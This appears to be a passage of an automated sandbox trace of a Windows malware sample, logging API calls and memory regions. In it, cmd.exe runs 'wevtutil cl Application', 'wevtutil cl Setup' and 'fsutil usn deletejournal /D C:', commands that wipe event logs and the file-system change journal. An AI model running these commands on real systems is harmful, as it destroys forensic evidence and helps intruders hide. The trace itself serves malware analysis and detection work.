lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.417] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x432848, lpFilePart=0x3cec14 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3cec14*="system32") returned 0x13 [0052.417] SetErrorMode (uMode=0x0) returned 0x1 [0052.417] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0052.418] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0052.418] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.418] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.418] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.*", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0x434278 [0052.419] FindClose (in: hFindFile=0x434278 | out: hFindFile=0x434278) returned 1 [0052.419] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.COM", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0xffffffff [0052.419] GetLastError () returned 0x2 [0052.420] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wevtutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0x434278 [0052.420] FindClose (in: hFindFile=0x434278 | out: hFindFile=0x434278) returned 1 [0052.424] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0052.424] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0052.424] GetConsoleTitleW (in: lpConsoleTitle=0x3cee88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.424] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ced10, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cedd8 | out: lpAttributeList=0x3ced10, lpSize=0x3cedd8) returned 1 [0052.424] UpdateProcThreadAttribute (in: lpAttributeList=0x3ced10, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cedd0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ced10, lpPreviousValue=0x0) returned 1 [0052.425] GetStartupInfoW (in: lpStartupInfo=0x3ceccc | out: lpStartupInfo=0x3ceccc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0052.425] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.426] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0052.427] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0052.428] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.428] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.428] lstrcmpW (lpString1="\\wevtutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0052.428] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wevtutil.exe", lpCommandLine="wevtutil cl Application ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3ced6c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wevtutil cl Application ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cedb8 | out: lpCommandLine="wevtutil cl Application ", lpProcessInformation=0x3cedb8*(hProcess=0x78, hThread=0x7c, dwProcessId=0xa08, dwThreadId=0xa0c)) returned 1 [0052.440] CloseHandle (hObject=0x7c) returned 1 [0052.440] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0052.440] GetEnvironmentStringsW () returned 0x4375f8 [0052.440] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.440] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0052.721] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3cecac | out: lpExitCode=0x3cecac*=0x0) returned 1 [0052.721] CloseHandle (hObject=0x78) returned 1 [0052.722] _vsnwprintf (in: _Buffer=0x3cedf4, _BufferCount=0x13, _Format="%08X", _ArgList=0x3cecb8 | out: _Buffer="00000000") returned 8 [0052.722] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0052.722] GetEnvironmentStringsW () returned 0x4375f8 [0052.722] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.722] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0052.722] GetEnvironmentStringsW () returned 0x4375f8 [0052.722] FreeEnvironmentStringsW (penv=0x4375f8) returned 1 [0052.722] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ced10 | out: lpAttributeList=0x3ced10) [0052.722] GetConsoleTitleW (in: lpConsoleTitle=0x3cf0f4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.723] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x437818, lpFilePart=0x3cec14 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x3cec14*="system32") returned 0x13 [0052.723] SetErrorMode (uMode=0x0) returned 0x1 [0052.723] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0052.723] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0052.723] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0052.723] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0052.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.*", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0x434278 [0052.724] FindClose (in: hFindFile=0x434278 | out: hFindFile=0x434278) returned 1 [0052.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.COM", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0xffffffff [0052.724] GetLastError () returned 0x2 [0052.724] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\fsutil.EXE", fInfoLevelId=0x1, lpFindFileData=0x3ce990, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ce990) returned 0x434278 [0052.724] FindClose (in: hFindFile=0x434278 | out: hFindFile=0x434278) returned 1 [0052.725] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0052.725] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0052.725] GetConsoleTitleW (in: lpConsoleTitle=0x3cee88, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0052.725] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ced10, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3cedd8 | out: lpAttributeList=0x3ced10, lpSize=0x3cedd8) returned 1 [0052.725] UpdateProcThreadAttribute (in: lpAttributeList=0x3ced10, dwFlags=0x0, Attribute=0x60001, lpValue=0x3cedd0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ced10, lpPreviousValue=0x0) returned 1 [0052.725] GetStartupInfoW (in: lpStartupInfo=0x3ceccc | out: lpStartupInfo=0x3ceccc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.725] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.726] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.727] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0052.727] lstrcmpW (lpString1="\\fsutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0052.727] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\fsutil.exe", lpCommandLine="fsutil usn deletejournal /D C:", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x3ced6c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="fsutil usn deletejournal /D C:", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3cedb8 | out: lpCommandLine="fsutil usn deletejournal /D C:", lpProcessInformation=0x3cedb8*(hProcess=0x7c, hThread=0x78, dwProcessId=0xa14, dwThreadId=0xa18)) returned 1 [0052.784] CloseHandle (hObject=0x78) returned 1 [0052.785] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0052.785] GetEnvironmentStringsW () returned 0x437960 [0052.785] FreeEnvironmentStringsW (penv=0x437960) returned 1 [0052.785] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0053.155] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x3cecac | out: lpExitCode=0x3cecac*=0x0) returned 1 [0053.155] CloseHandle (hObject=0x7c) returned 1 [0053.157] _vsnwprintf (in: _Buffer=0x3cedf4, _BufferCount=0x13, _Format="%08X", _ArgList=0x3cecb8 | out: _Buffer="00000000") returned 8 [0053.157] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0053.160] GetEnvironmentStringsW () returned 0x437960 [0053.160] FreeEnvironmentStringsW (penv=0x437960) returned 1 [0053.160] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0053.160] GetEnvironmentStringsW () returned 0x437960 [0053.160] FreeEnvironmentStringsW (penv=0x437960) returned 1 [0053.160] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ced10 | out: lpAttributeList=0x3ced10) [0053.161] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.161] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.163] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.163] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0a41ac | out: lpMode=0x4a0a41ac) returned 1 [0053.168] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.168] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0a41b0 | out: lpMode=0x4a0a41b0) returned 1 [0053.168] SetConsoleInputExeNameW () returned 0x1 [0053.168] GetConsoleOutputCP () returned 0x1b5 [0053.169] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0a4260 | out: lpCPInfo=0x4a0a4260) returned 1 [0053.169] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.169] exit (_Code=0) Process: id = "7" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x288c2000" os_pid = "0x9e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9d0" cmd_line = "wevtutil cl Setup " cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 609 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 610 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 611 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 612 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 613 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 614 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 615 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 616 start_va = 0xe60000 end_va = 0xe8cfff entry_point = 0xe635ed region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 617 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 618 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 619 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 620 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 621 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 622 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 623 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 624 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 625 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 626 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 627 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 628 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 629 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 630 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 631 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 632 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 633 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 634 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 635 start_va = 0x749a0000 end_va = 0x749e1fff entry_point = 0x749a1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 636 start_va = 0x749f0000 end_va = 0x74a1afff entry_point = 0x749f14af region_type = mapped_file name = "credui.dll" filename = "\\Windows\\SysWOW64\\credui.dll" (normalized: "c:\\windows\\syswow64\\credui.dll") Region: id = 637 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 638 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 639 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 640 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 641 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 642 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 643 start_va = 0x76110000 end_va = 0x7619efff entry_point = 0x76113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 644 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 645 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 646 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 647 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 648 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 649 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 650 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 651 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 652 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = 